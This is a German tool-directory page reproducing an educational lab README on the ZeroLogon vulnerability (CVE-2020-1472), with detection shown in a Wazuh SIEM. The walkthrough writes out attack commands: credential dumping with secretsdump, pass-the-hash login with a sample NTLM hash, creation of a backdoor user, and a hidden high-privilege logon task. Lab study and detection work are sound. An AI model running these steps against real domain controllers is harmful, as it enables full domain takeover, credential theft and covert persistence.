Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ZeroLogon-CVE-2020-1472-lab — Erklärung und Demonstration der ZeroLogon-Sicherheitslücke (CVE-2020-1472) | Kitploit
Tools/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
Privilege EscalationPasswortangriffePersistenzmechanismenSchwachstellenanalyseExploitationPost-ExploitationCTFPenetrationstestsLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Labs & Praxis
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

Erklärung und Demonstration der ZeroLogon-Sicherheitslücke (CVE-2020-1472)

Repository anzeigen
3vor 11 MonatenNoch nicht geprüft

ZeroLogon-CVE-2020-1472

Erklärung und Demonstration der ZeroLogon-Schwachstelle (CVE-2020-1472)

Der Zweck dieses Labors ist ausschließlich zu Bildungszwecken. Die Ausführung wird nicht in Produktionsumgebungen oder auf Systemen empfohlen, die Ihnen nicht gehören.

Über die Schwachstelle

Kontext der Schwachstelle

Diese Schwachstelle ermöglicht es einem Cyberkriminellen, die Kontrolle über einen Domänencontroller (DC) zu übernehmen. Dies geschieht durch Ändern oder Entfernen des Passworts eines Dienstkontos auf dem Controller. Der böswillige Akteur kann entweder einen Denial-of-Service verursachen oder die Kontrolle über das gesamte Netzwerk übernehmen. Im August 2020 veröffentlichte Microsoft einen Patch.

  • Schweregrad: 10.0 (Kritisch) (CVSS v3.1)

Betroffene Komponente: Microsoft Netlogon Remote Protocol (MS-NRPC)

Betroffene Windows-Versionen:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • Versionen vor dem Patch von August/September 2020

Voraussetzungen

Repositories klonen

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - Testen, ob der Zielserver verwundbar ist

Wenn Sie es lokal ausführen möchten!

  • Kali Linux herunterladen
  • Windows Server 2008 R2 (verwundbar) herunterladen
  • Virtualbox

In der AWS ist es auch mit diesen Images möglich (Achtung vor den Kosten)

  • Windows (verwundbar) - AMI der Community 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI vom Marketplace

Extra: Ein Wazuh-Konto zur Analyse der SIEM-Ereignisse.

  • Wazuh Cloud mit 14-tägiger Testversion

Wie man es ausnutzt

Tipp: Unter Kali Linux ist der SSH-Dienst standardmäßig deaktiviert – er muss manuell gestartet werden.

Bevor wir testen, ob der Server verwundbar ist, können wir nmap verwenden, um zu sehen, welche Ports offen sind:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
Captura de Tela 2025-10-10 às 09 34 13

Verwenden Sie CVE-2020-1472 - Testen, ob der Zielserver verwundbar ist. Führen Sie den Befehl aus:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
Captura de Tela 2025-10-04 às 20 14 40

Das Tool secretdump ist ein Teil von Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
Captura de Tela 2025-10-04 às 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
Captura de Tela 2025-10-04 às 20 27 05

Wenn alles gut geht, können wir uns mit dem Hash anmelden Was ist ein Pass-the-Hash-Angriff?

Captura de Tela 2025-10-04 às 20 30 39

Jetzt nur noch eine Persistenz erstellen! Das kann ein neuer Benutzer sein!

root@kitploit:~
net user coringa Batman2025 /add
Captura de Tela 2025-10-04 às 20 36 09

Erledigt! Der Benutzer wurde erfolgreich erstellt!

Captura de Tela 2025-10-04 às 20 38 04

Es ist auch möglich, eine Aufgabe zu erstellen!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
Captura de Tela 2025-10-10 às 10 17 17 Captura de Tela 2025-10-10 às 10 20 33

Ereignisse im SIEM

Es ist möglich, die Erstellung von Benutzern und die Ereignisse im Zusammenhang mit Pass-the-Hash und die Erstellung von Benutzern zu sehen!

2025-10-06_10-08-10 2025-10-06_10-09-06

Referenzen

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • Was ist Zerologon?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 Detail
  • ZeroLogon-CVE-2020-1472 - Labor auf Youtube
  • Pass-the-Hash Attack
  • Weitere Informationen zu Impacket
Tool herunterladen